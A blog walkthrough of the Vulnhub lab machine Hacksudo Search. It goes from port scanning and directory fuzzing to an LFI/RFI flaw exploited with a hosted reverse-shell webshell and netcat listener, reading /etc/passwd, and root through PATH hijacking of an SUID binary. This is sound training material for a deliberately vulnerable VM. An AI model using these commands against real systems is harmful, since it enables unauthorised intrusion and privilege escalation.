Walkthrough of Hacksudo Search – Vulnhub – Writeup

In this post, I am going to do the walkthrough of a machine from Vulnhub called Hacksudo Search. In this writeup, I will be explaining all the steps to get to the root user.

Link to the machine: https://www.vulnhub.com/entry/hacksudo-search,683/

All walkthroughs: https://nepcodex.com/tag/walkthrough/

Identify the target

First of all, I have to identify the IP address of the target. So, I can use a tool called netdiscover to do this.

sudo netdiscover -i eth0 -r 10.0.2.1/24

Next, I have to do scan the open ports.

Scan open ports

nmap -T4 -sC -sV -p- --min-rate=1000 10.0.2.21

Here, I found that ports 80 and 22 are open. Thus, I am going to see what the website offers. However, there is nothing important on the main screen as it has a search feature that would fire up Google search.

Now that, I have to do directory enumeration in the webserver.

Directory Enumeration

gobuster dir -u http://10.0.2.21 -x html,txt,php --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Here, I found an interesting page that is similar to the main page. Hence, I looked around the webpage to see any vulnerabilities.

I found a must compelling evidence for Local File Inclusions (LFI) and Remote File Inclusions (RFI). However, I had no luck getting the exploit.

Fuzz

While doing fuzzing, I generally try different combinations with existing known parameters. So, I know that the parameter ‘me’ is vulnerable to LFI. However, for the purpose of the walkthrough, I am going to use wfuzz.

wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.0.2.21/search1.php?FUZZ=contact.php --hl 137

The parameter “me” gave a different output. Eventually, we got the same result with our manual inspection. Subsequently, I opened the /etc/passwd file to view the users of the machine.

Now, I can try RFI vulnerability. For that, I copied a webshell to get the reverse shell and listened on the port.

nc -nlvp 4444 # Listen to the port 4444
# Copied webshell and change the ip and port to 10.0.2.15 and 4444 respectively
python3 -m http.server 9000

On the /var/www/html directory, I found a .env file which had a possible password of one of the users. Hence, I decided to switch to different users from the passwd file.

Finally, I got the user shell and I will login using SSH.

Privilege escalation to root

After I got the user’s shell, I had to do the privilege escalation.

find / -perm -4000 -exec ls -al {} \; 2>/dev/null

I found an SUID binary and its source that could get me root access.

As we can see above, the binary runs a binary “install” that is present in the PATH. Now, I can create my own binary that could give me a root shell.

cd /tmp
echo '/bin/bash -i' > install
chmod +x install
cd ~/search/tools/
export PATH=/tmp/:$PATH
./searchinstall -p

Finally, we got the root shell and the root flag as well.

0 0 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments